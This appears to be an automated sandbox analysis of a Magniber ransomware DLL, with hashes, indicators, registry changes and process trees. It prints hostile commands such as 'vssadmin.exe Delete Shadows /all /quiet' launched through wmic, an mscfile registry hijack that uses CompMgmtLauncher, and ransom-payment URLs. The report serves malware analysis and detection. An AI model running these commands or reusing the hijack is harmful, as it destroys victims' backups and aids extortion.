Analysis
-
max time kernel
123s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
25-12-2023 02:42
Static task
static1
Behavioral task
behavioral1
Sample
009aaaf3b4f3a34b662cb9d27fb4409d.dll
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
009aaaf3b4f3a34b662cb9d27fb4409d.dll
Resource
win10v2004-20231215-en
General
-
Target
009aaaf3b4f3a34b662cb9d27fb4409d.dll
-
Size
39KB
-
MD5
009aaaf3b4f3a34b662cb9d27fb4409d
-
SHA1
ac5bfd05ec67090c4f7180519628328e29f3f39a
-
SHA256
2b474cca6c5ff5e1d435d91694b4436876901e3be9c63c3a1d76ff3dbc432017
-
SHA512
50973c3ac2849c8664d74d7efc07fcb0a43260d05030fa7772f135cf716357d522309e70d7ba4ee51cd44ea7a3c711b321221b33ab192ccce6ee71dceb527aea
-
SSDEEP
768:QJvL0rvzhHm06R0Zd+01mV0kgMazfo269xnWf77/KrkVPe4kQKNNJ7kIGsp9C88K:q0rvzhV6Ra+01Y0dMio39xWDrKrkVm4i
Malware Config
Extracted
C:\Users\Admin\Pictures\readme.txt
magniber
http://5e3cb4a0fe301ec0b2sgokwyejx.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/sgokwyejx
http://5e3cb4a0fe301ec0b2sgokwyejx.actmake.site/sgokwyejx
http://5e3cb4a0fe301ec0b2sgokwyejx.bearsat.space/sgokwyejx
http://5e3cb4a0fe301ec0b2sgokwyejx.mixedon.xyz/sgokwyejx
http://5e3cb4a0fe301ec0b2sgokwyejx.spiteor.space/sgokwyejx
Signatures
-
Detect magniber ransomware 2 IoCs
resource yara_rule behavioral1/memory/2536-0-0x0000000001D70000-0x00000000020AA000-memory.dmp family_magniber behavioral1/memory/1200-109-0x0000000001C80000-0x0000000001C84000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2684 1628 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2784 1628 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2036 1628 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1652 1628 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1820 1628 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 204 1628 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1440 1628 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1564 1628 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 396 1628 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 816 1628 vssadmin.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2964 1628 cmd.exe 39 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1152 1628 vssadmin.exe 39 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (79) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2536 set thread context of 1200 2536 rundll32.exe 12 PID 2536 set thread context of 1272 2536 rundll32.exe 16 PID 2536 set thread context of 1340 2536 rundll32.exe 15 -
Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1820 vssadmin.exe 204 vssadmin.exe 1440 vssadmin.exe 396 vssadmin.exe 816 vssadmin.exe 1152 vssadmin.exe 2784 vssadmin.exe 2036 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "409765519" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4098343f0e38da01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{69C31FF1-A401-11EE-9D0D-D2016227024C} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d80bef292bee784c8e3c940d61fdfeb800000000020000000000106600000001000020000000dfac07e2e56802a0f784a6d8391795e301cedbf5250046763db7bf4e3ec8ea9e000000000e8000000002000020000000d9013517aed9a9c778738f61647d60559f7436943b9716e8a63e04f2f57d1620900000006359ac233a5b2fd65541592df140e23d1a962d9ead33083c464a93a08e16ac20b47299ad36ad244bfa5b09408886e0a7e7150bd224e502fdaaa37828b29089edf19c025f6aeb7bcb596bdb0f082edfbd93cc8bfb4034d8136f72b4aeb56ad557d0e4ad3c77ea4d8d37cb61672b06413d6f2d3d674fae3bd5436bbc20520c01b5341f56e2398b099a7a5064ec6492473540000000c5316852049b61879a4d2ed3870bf5a9ee480b55974ee455f78ff9c9e0fc7e686b61fc83019a5a36abc2c52b1142b6904f9fa2c1a152f5ad70265a2c66039fc0 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d80bef292bee784c8e3c940d61fdfeb800000000020000000000106600000001000020000000993f7ad6251a0efa4ac20540075ef897fa7625b31c3d42a85a9ae7eca1fdfe86000000000e800000000200002000000053b6e4b39c3f01a2f51e74d6e5eb8a4e8cd0975726d820c9738735b79604670d20000000430e9da110e017f599e3f406f94b9d964c967302f3504858774818049ca63a52400000002b7fdb46ce12ae83359bf08fbfa1d85fdc2572e9fcea09b6f78acd0106e6218823905485414c5ce1fb70dea1a47363a6a0aca977fe70193d27c901ae039e0085 iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1948 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2536 rundll32.exe 2536 rundll32.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2536 rundll32.exe 2536 rundll32.exe 2536 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1968 wmic.exe Token: SeSecurityPrivilege 1968 wmic.exe Token: SeTakeOwnershipPrivilege 1968 wmic.exe Token: SeLoadDriverPrivilege 1968 wmic.exe Token: SeSystemProfilePrivilege 1968 wmic.exe Token: SeSystemtimePrivilege 1968 wmic.exe Token: SeProfSingleProcessPrivilege 1968 wmic.exe Token: SeIncBasePriorityPrivilege 1968 wmic.exe Token: SeCreatePagefilePrivilege 1968 wmic.exe Token: SeBackupPrivilege 1968 wmic.exe Token: SeRestorePrivilege 1968 wmic.exe Token: SeShutdownPrivilege 1968 wmic.exe Token: SeDebugPrivilege 1968 wmic.exe Token: SeSystemEnvironmentPrivilege 1968 wmic.exe Token: SeRemoteShutdownPrivilege 1968 wmic.exe Token: SeUndockPrivilege 1968 wmic.exe Token: SeManageVolumePrivilege 1968 wmic.exe Token: 33 1968 wmic.exe Token: 34 1968 wmic.exe Token: 35 1968 wmic.exe Token: SeIncreaseQuotaPrivilege 1824 WMIC.exe Token: SeSecurityPrivilege 1824 WMIC.exe Token: SeTakeOwnershipPrivilege 1824 WMIC.exe Token: SeLoadDriverPrivilege 1824 WMIC.exe Token: SeSystemProfilePrivilege 1824 WMIC.exe Token: SeSystemtimePrivilege 1824 WMIC.exe Token: SeProfSingleProcessPrivilege 1824 WMIC.exe Token: SeIncBasePriorityPrivilege 1824 WMIC.exe Token: SeCreatePagefilePrivilege 1824 WMIC.exe Token: SeBackupPrivilege 1824 WMIC.exe Token: SeRestorePrivilege 1824 WMIC.exe Token: SeShutdownPrivilege 1824 WMIC.exe Token: SeDebugPrivilege 1824 WMIC.exe Token: SeSystemEnvironmentPrivilege 1824 WMIC.exe Token: SeRemoteShutdownPrivilege 1824 WMIC.exe Token: SeUndockPrivilege 1824 WMIC.exe Token: SeManageVolumePrivilege 1824 WMIC.exe Token: 33 1824 WMIC.exe Token: 34 1824 WMIC.exe Token: 35 1824 WMIC.exe Token: SeIncreaseQuotaPrivilege 1824 WMIC.exe Token: SeSecurityPrivilege 1824 WMIC.exe Token: SeTakeOwnershipPrivilege 1824 WMIC.exe Token: SeLoadDriverPrivilege 1824 WMIC.exe Token: SeSystemProfilePrivilege 1824 WMIC.exe Token: SeSystemtimePrivilege 1824 WMIC.exe Token: SeProfSingleProcessPrivilege 1824 WMIC.exe Token: SeIncBasePriorityPrivilege 1824 WMIC.exe Token: SeCreatePagefilePrivilege 1824 WMIC.exe Token: SeBackupPrivilege 1824 WMIC.exe Token: SeRestorePrivilege 1824 WMIC.exe Token: SeShutdownPrivilege 1824 WMIC.exe Token: SeDebugPrivilege 1824 WMIC.exe Token: SeSystemEnvironmentPrivilege 1824 WMIC.exe Token: SeRemoteShutdownPrivilege 1824 WMIC.exe Token: SeUndockPrivilege 1824 WMIC.exe Token: SeManageVolumePrivilege 1824 WMIC.exe Token: 33 1824 WMIC.exe Token: 34 1824 WMIC.exe Token: 35 1824 WMIC.exe Token: SeIncreaseQuotaPrivilege 1968 wmic.exe Token: SeSecurityPrivilege 1968 wmic.exe Token: SeTakeOwnershipPrivilege 1968 wmic.exe Token: SeLoadDriverPrivilege 1968 wmic.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 868 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 868 iexplore.exe 868 iexplore.exe 2596 IEXPLORE.EXE 2596 IEXPLORE.EXE 2596 IEXPLORE.EXE 2596 IEXPLORE.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 1340 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1200 wrote to memory of 1948 1200 taskhost.exe 28 PID 1200 wrote to memory of 1948 1200 taskhost.exe 28 PID 1200 wrote to memory of 1948 1200 taskhost.exe 28 PID 1200 wrote to memory of 1740 1200 taskhost.exe 29 PID 1200 wrote to memory of 1740 1200 taskhost.exe 29 PID 1200 wrote to memory of 1740 1200 taskhost.exe 29 PID 1200 wrote to memory of 1968 1200 taskhost.exe 30 PID 1200 wrote to memory of 1968 1200 taskhost.exe 30 PID 1200 wrote to memory of 1968 1200 taskhost.exe 30 PID 1200 wrote to memory of 1420 1200 taskhost.exe 31 PID 1200 wrote to memory of 1420 1200 taskhost.exe 31 PID 1200 wrote to memory of 1420 1200 taskhost.exe 31 PID 1420 wrote to memory of 1824 1420 cmd.exe 35 PID 1420 wrote to memory of 1824 1420 cmd.exe 35 PID 1420 wrote to memory of 1824 1420 cmd.exe 35 PID 1740 wrote to memory of 868 1740 cmd.exe 38 PID 1740 wrote to memory of 868 1740 cmd.exe 38 PID 1740 wrote to memory of 868 1740 cmd.exe 38 PID 2684 wrote to memory of 2988 2684 cmd.exe 46 PID 2684 wrote to memory of 2988 2684 cmd.exe 46 PID 2684 wrote to memory of 2988 2684 cmd.exe 46 PID 868 wrote to memory of 2596 868 iexplore.exe 48 PID 868 wrote to memory of 2596 868 iexplore.exe 48 PID 868 wrote to memory of 2596 868 iexplore.exe 48 PID 868 wrote to memory of 2596 868 iexplore.exe 48 PID 2988 wrote to memory of 2688 2988 CompMgmtLauncher.exe 50 PID 2988 wrote to memory of 2688 2988 CompMgmtLauncher.exe 50 PID 2988 wrote to memory of 2688 2988 CompMgmtLauncher.exe 50 PID 1272 wrote to memory of 2640 1272 Dwm.exe 55 PID 1272 wrote to memory of 2640 1272 Dwm.exe 55 PID 1272 wrote to memory of 2640 1272 Dwm.exe 55 PID 1272 wrote to memory of 2652 1272 Dwm.exe 56 PID 1272 wrote to memory of 2652 1272 Dwm.exe 56 PID 1272 wrote to memory of 2652 1272 Dwm.exe 56 PID 2652 wrote to memory of 2904 2652 cmd.exe 59 PID 2652 wrote to memory of 2904 2652 cmd.exe 59 PID 2652 wrote to memory of 2904 2652 cmd.exe 59 PID 1652 wrote to memory of 1616 1652 cmd.exe 64 PID 1652 wrote to memory of 1616 1652 cmd.exe 64 PID 1652 wrote to memory of 1616 1652 cmd.exe 64 PID 1616 wrote to memory of 1088 1616 CompMgmtLauncher.exe 66 PID 1616 wrote to memory of 1088 1616 CompMgmtLauncher.exe 66 PID 1616 wrote to memory of 1088 1616 CompMgmtLauncher.exe 66 PID 1340 wrote to memory of 772 1340 Explorer.EXE 69 PID 1340 wrote to memory of 772 1340 Explorer.EXE 69 PID 1340 wrote to memory of 772 1340 Explorer.EXE 69 PID 1340 wrote to memory of 856 1340 Explorer.EXE 70 PID 1340 wrote to memory of 856 1340 Explorer.EXE 70 PID 1340 wrote to memory of 856 1340 Explorer.EXE 70 PID 856 wrote to memory of 1752 856 cmd.exe 73 PID 856 wrote to memory of 1752 856 cmd.exe 73 PID 856 wrote to memory of 1752 856 cmd.exe 73 PID 1564 wrote to memory of 2264 1564 cmd.exe 78 PID 1564 wrote to memory of 2264 1564 cmd.exe 78 PID 1564 wrote to memory of 2264 1564 cmd.exe 78 PID 2264 wrote to memory of 2420 2264 CompMgmtLauncher.exe 79 PID 2264 wrote to memory of 2420 2264 CompMgmtLauncher.exe 79 PID 2264 wrote to memory of 2420 2264 CompMgmtLauncher.exe 79 PID 2536 wrote to memory of 2376 2536 rundll32.exe 83 PID 2536 wrote to memory of 2376 2536 rundll32.exe 83 PID 2536 wrote to memory of 2376 2536 rundll32.exe 83 PID 2536 wrote to memory of 2308 2536 rundll32.exe 84 PID 2536 wrote to memory of 2308 2536 rundll32.exe 84 PID 2536 wrote to memory of 2308 2536 rundll32.exe 84 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1948
-
-
C:\Windows\system32\cmd.execmd /c "start http://5e3cb4a0fe301ec0b2sgokwyejx.actmake.site/sgokwyejx^&2^&35892517^&79^&381^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://5e3cb4a0fe301ec0b2sgokwyejx.actmake.site/sgokwyejx&2&35892517&79&381&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2596
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\009aaaf3b4f3a34b662cb9d27fb4409d.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2376
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵PID:2308
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1916
-
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:772
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:1752
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2640
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:2904
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2688
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2784
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2900
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2036
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1088
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1820
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:204
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1440
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2420
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:396
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:816
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
PID:2964 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:1244
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1648
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1152
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD54aa1512cf9e9af18a727907870b5ed02
SHA1b971702d75493516b8dbc29dc5e1da69bb2a0c3c
SHA2560a60982943c34cc895d58778e82dcb681ab305bb7a5519153a2471facf5e046a
SHA512ccb8cbfd7997618194bf7cd19aa772f0b5e737f6c95f12084985e8ddfad1d7d7d1ad58785c5ffad29e1ec4381b84be073dd5c185bfd911102646d1f50ca9a30c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD542035dd9d1b1a10ea64b6fe31881f1a6
SHA1c0338c09fc3cf88160eccf581dfaff231f0c7027
SHA256650a79753c7b00e73e2931c74a900ac827b16a4afd5298ea2813788edb446a2e
SHA512ee2e408cdfee554330ca9844ffcf1dbf1093233afaf37468d2bb4fc6160bab6e20db9e941089d0db4fda5f684f8675ddf3a5a675af28a0ded95bf8af67ff4170
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f8c8052e170e9c4460ceea1293f5d050
SHA1da2b0504f7d5a8b4cf9ecf070e295d687d2a8caa
SHA256c871a681d55f853726740acbb76f2107c5fe610cb829d3996aacc96bb021ccbf
SHA512a7a4ff5647a1acf3b500233c6ce69b00e02b22fcb3447e7f61fb87b61e83c90dac54ee0b973610148ca3602b8eabfb6670bd05a6516a43e0dba544269e9d3086
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD556f99f425b2418129892c77122800f18
SHA11f013e9254e7c38b8bf4a9eef7b504c1392da0dc
SHA256d7f0201b5361edc8e3412d491273bdcc6f9f49c28bc32eb242c5ee5db52c9271
